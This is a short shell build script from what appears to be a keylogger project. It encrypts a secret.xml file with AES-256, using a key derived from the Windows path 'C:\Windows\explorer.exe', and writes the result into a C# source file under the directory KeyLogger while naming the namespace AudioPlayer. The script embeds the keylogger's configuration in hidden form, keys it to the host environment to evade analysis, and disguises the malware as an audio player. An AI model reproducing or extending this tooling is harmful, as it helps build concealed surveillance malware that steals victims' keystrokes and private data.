key=$(echo -n "C:\\Windows\\explorer.exe" | xxd -ps)
iv_hex=$(xxd -ps -l 16 < /dev/urandom)
iv_bytes=$(echo $iv_hex | xxd -r -ps -l 16 | xxd -i)

data=$(openssl enc -aes-256-cbc -e -in secret.xml -K "$key" -iv "$iv_hex" | xxd -i | sed "s/^/      /g")
cat > KeyLogger/KeyLogger/SecretData.cs <<EOF
// AUTOGENERATED, DO NOT MODIFY
namespace AudioPlayer {
  class SecretData {
    public static byte[] iv = {$iv_bytes};
    public static byte[] data = {
$data
    };
  }
}
EOF

